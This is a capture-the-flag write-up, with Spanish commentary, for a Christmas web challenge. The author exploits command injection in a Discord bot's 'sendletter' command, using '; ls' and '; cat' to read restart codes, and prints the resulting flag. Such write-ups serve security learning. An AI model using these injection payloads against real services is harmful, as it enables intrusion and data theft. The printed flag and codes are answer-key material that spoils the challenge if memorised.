# Santa's Helper Mechagnome (web, 50p, 111 solved)

> One of our main production Mechagnomes is now malfunctioning. You have to 
> access its control panel by directly messaging Helper Mechagnome#9926 (You 
> can find him resting on our main discord server).
>
> Get the restart codes, and restart it so that our toy factory can continue 
> working!
>
> One of our main production Mechagnomes is now malfunctioning. You have to 
> access its control panel by directly messaging Helper Mechagnome#9926 (You 
> can find him resting on our main discord server).
> 
> Get the restart codes, and restart it so that our toy factory can continue 
> working!

Joder, tengo un puto bot de Discord..me cago en todo. Voy a hablar con este 
a ver que me cuenta...

```
>>>>> b10nd
restart

>>>>> Helper MechaGnomeBOT
MechaGnome v1.0 :hammer_pick: 
Santa's #1 Galvanized Helper Gnome

Current State: CORRUPTEd?

Please supply the correct restart codes.
Correct Usage: restart XXXXX-XXXXX-XXXXX-XXXXX-XXXXX
```

Bueno, ya se la forma que tiene el codigo que me permite restaurar el bot.

Probando caracteres al comando "sendletter" me encuentro con este pastel.

```
>>>>> b10nd
sendletter LOLOLOL@santa.com <>

>>>>> Helper MechaGnomeBOT
MechaGnome v1.0 :hammer_pick: 
Santa's #1 Galvanized Helper Gnome

Current State: CORRUPTEd?

CLANG!
What was that?

Correct Usage: sendletter address@santa.com message
```

Esto ya huele a que estoy ejecutando comandos sobre algun interprete 
customizado, porque me esta filtrando chars. Sigo probando..

```
>>>>> b10nd
sendletter LOLOLOL@santa.com !

>>>>> Helper MechaGnomeBOT
MechaGnome v1.0 :hammer_pick: 
Santa's #1 Galvanized Helper Gnome

Current State: CORRUPTEd?

Sent the following message:

!

To The following Address: LOLOLOL@santa.com
```

Aqui veo que hay chars que si que acepta. Sigo probando...

```
>>>>> b10nd
sendletter LOLOLOL@santa.com :;'"

>>>>> Helper MechaGnomeBOT
MechaGnome v1.0 :hammer_pick: 
Santa's #1 Galvanized Helper Gnome

Current State: CORRUPTEd?

Sent the following message:
\`\`\`\`\`\`
To The following Address: LOLOLOL@santa.com
```

Aqui ya me llama la atencion, porque no ha impreso nada, como si hubiera 
ignorado los chars.

```
>>>>> b10nd
sendletter LOLOLOL@santa.com ; ls
>>>>> Helper MechaGnomeBOT
MechaGnome v1.0 :hammer_pick: 
Santa's #1 Galvanized Helper Gnome

Current State: CORRUPTEd?

Sent the following message:

mecha.py
robot_restart_codes.txt

To The following Address: LOLOLOL@santa.com
```

Bingo! Puerta abierta, printeo el txt y para casa. Que te jodan, bot 
disfuncional.

```
>>>>> b10nd
sendletter LOLOLOL@santa.com ; cat robot_restart_codes.txt

>>>>> Helper MechaGnomeBOT
MechaGnome v1.0 :hammer_pick: 
Santa's #1 Galvanized Helper Gnome

Current State: CORRUPTEd?

Sent the following message:

Cobalt Inc. MechaGnome Restart Codes:\r
XJACO-10U4C-C091U-VNOAC-J2QCS

To The following Address: LOLOLOL@santa.com

>>>>> b10nd
restart XJACO-10U4C-C091U-VNOAC-J2QCS

>>>>> Helper MechaGnomeBOT
MechaGnome v1.0 :hammer_pick: 
Santa's #1 Galvanized Helper Gnome

Current State: CORRUPTEd?

Restarting...
Nice work! Flag: X-MAS{Wh0_Kn3W_4_H3lp3r_M3ch4gN0m3_W0uLd_b3_S0_vULN3R4bL3}
```

Solucion: X-MAS{Wh0_Kn3W_4_H3lp3r_M3ch4gN0m3_W0uLd_b3_S0_vULN3R4bL3}


